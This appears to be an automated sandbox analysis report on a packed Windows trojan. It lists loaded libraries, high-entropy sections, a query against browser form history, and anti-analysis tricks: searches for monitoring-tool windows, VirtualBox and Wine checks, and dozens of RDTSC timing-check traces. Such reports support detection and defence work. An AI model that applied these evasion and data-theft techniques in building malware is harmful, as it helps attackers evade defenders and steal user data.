Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D672C0 | 0_2_00D672C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C9CA03 | 0_2_00C9CA03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D71A0D | 0_2_00D71A0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DFFA3D | 0_2_00DFFA3D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D62351 | 0_2_00D62351
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D21B12 | 0_2_00D21B12
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D77CDB | 0_2_00D77CDB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D68CE6 | 0_2_00D68CE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D72C02 | 0_2_00D72C02
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF95D4 | 0_2_00DF95D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5CDDD | 0_2_00C5CDDD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D63DB7 | 0_2_00D63DB7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D74685 | 0_2_00D74685
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7FE5C | 0_2_00C7FE5C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6F61B | 0_2_00D6F61B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D657FA | 0_2_00D657FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6A7FA | 0_2_00D6A7FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D17F39 | 0_2_00D17F39
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009B4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: lfcefhqr ZLIB complexity 0.9947995965286236
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_009D3A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_009CCAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\S80LOU2M.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1351848119.00000000010AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT fieldname, value FROM moz_formhistory;Q2
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1787392 > 1048576
Source: file.exe | Static PE information: Raw size of lfcefhqr is bigger than: 0x100000 < 0x19a800

Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lfcefhqr:EW;phkznexg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lfcefhqr:EW;phkznexg:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_009D6390
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x1b4812 should be: 0x1c1ada
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: lfcefhqr
              Source: file.exe | Static PE information: section name: phkznexg
              Source: file.exe | Static PE information: section name: .taggant
              Source: file.exe | Static PE information: section name: lfcefhqr entropy: 7.955184799443045

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_009D6390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25967
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB6A58 second address: DB6A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB746A second address: DB7475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F99A0E9ACE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB71FA second address: DB7203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7203 second address: DB7217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A0E9ACECh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7F03 second address: DB7F8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F99A1050D77h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F99A1050D68h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov esi, 752BFAA0h 0x0000002d push 00000000h 0x0000002f mov edi, 183A4280h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F99A1050D68h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 add dword ptr [ebp+122D37F1h], ecx 0x00000056 xchg eax, ebx 0x00000057 ja 00007F99A1050D74h 0x0000005d jmp 00007F99A1050D6Eh 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7F8F second address: DB7F9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F99A0E9ACE6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA675 second address: DBA679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA679 second address: DBA67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBBB9F second address: DBBBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAD82 second address: DBAD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBBBA3 second address: DBBBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99A1050D6Dh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCD30 second address: DBCD9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F99A0E9ACE8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jmp 00007F99A0E9ACF0h 0x0000002b sub dword ptr [ebp+122DBB22h], eax 0x00000031 push 00000000h 0x00000033 jmp 00007F99A0E9ACF1h 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jc 00007F99A0E9ACE6h 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCD9A second address: DBCD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCD9E second address: DBCDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDD6F second address: DBDD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDD73 second address: DBDDFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99A0E9ACF4h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F99A0E9ACF9h 0x00000012 nop 0x00000013 mov ebx, esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F99A0E9ACE8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1816h], edx 0x00000037 mov ebx, dword ptr [ebp+122D2A4Fh] 0x0000003d push 00000000h 0x0000003f movsx edi, bx 0x00000042 xchg eax, esi 0x00000043 jmp 00007F99A0E9ACF6h 0x00000048 push eax 0x00000049 pushad 0x0000004a push esi 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d pop esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDDFE second address: DBDE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF49 second address: DBCF53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F99A0E9ACE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF53 second address: DBCF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F99A1050D68h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF66 second address: DBCFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+122D2E23h] 0x0000000f jmp 00007F99A0E9ACEEh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F99A0E9ACE8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jng 00007F99A0E9ACECh 0x00000042 sub dword ptr [ebp+122D397Dh], edi 0x00000048 mov eax, dword ptr [ebp+122D155Dh] 0x0000004e movzx ebx, bx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push esi 0x00000056 call 00007F99A0E9ACE8h 0x0000005b pop esi 0x0000005c mov dword ptr [esp+04h], esi 0x00000060 add dword ptr [esp+04h], 00000017h 0x00000068 inc esi 0x00000069 push esi 0x0000006a ret 0x0000006b pop esi 0x0000006c ret 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 jp 00007F99A0E9ACECh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCFEF second address: DBCFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBECC5 second address: DBED29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A0E9ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F99A0E9ACE8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 movzx edi, di 0x0000002b push 00000000h 0x0000002d jmp 00007F99A0E9ACF3h 0x00000032 xchg eax, esi 0x00000033 je 00007F99A0E9ACF8h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED29 second address: DBED2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED2D second address: DBED3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99A0E9ACE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED3E second address: DBED44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED44 second address: DBED4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F99A0E9ACE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED4E second address: DBED52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCFF3 second address: DBD00E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99A0E9ACECh 0x00000008 jng 00007F99A0E9ACE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jnp 00007F99A0E9ACE6h 0x0000001a pop ebx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFDF2 second address: DBFDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFDF8 second address: DBFDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFDFC second address: DBFE0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F99A1050D6Eh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFE0E second address: DBFE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D1C58h], ebx 0x0000000c mov ebx, dword ptr [ebp+122D2C17h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F99A0E9ACE8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 sub edi, 156E4E5Fh 0x00000036 xchg eax, esi 0x00000037 push edi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFE54 second address: DBFE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFE58 second address: DBFE5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1D0D second address: DC1D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0FB6 second address: DC0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F99A0E9ACE6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0FC2 second address: DC0FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2D5C second address: DC2D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2D62 second address: DC2DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F99A1050D68h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F99A1050D68h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov ebx, ecx 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F99A1050D72h 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2DC9 second address: DC2DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F99A0E9ACE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2EF3 second address: DC2EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC2EF7 second address: DC2EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3E62 second address: DC3E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5EB4 second address: DC5EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6E73 second address: DC6E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7D9D second address: DC7DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC7E59 second address: DC7E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8BAF second address: DC8BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F99A0E9ACE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8BB9 second address: DC8BC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8BC7 second address: DC8BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F99A0E9ACE6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCD5F8 second address: DCD5FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A347 second address: D6A368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F99A0E9ACF9h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1FED second address: DD1FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD17E0 second address: DD17E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1A56 second address: DD1A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 jns 00007F99A1050D6Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F99A1050D6Dh 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BD5 second address: DD1BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BD9 second address: DD1BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BDD second address: DD1BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F99A0E9ACEEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
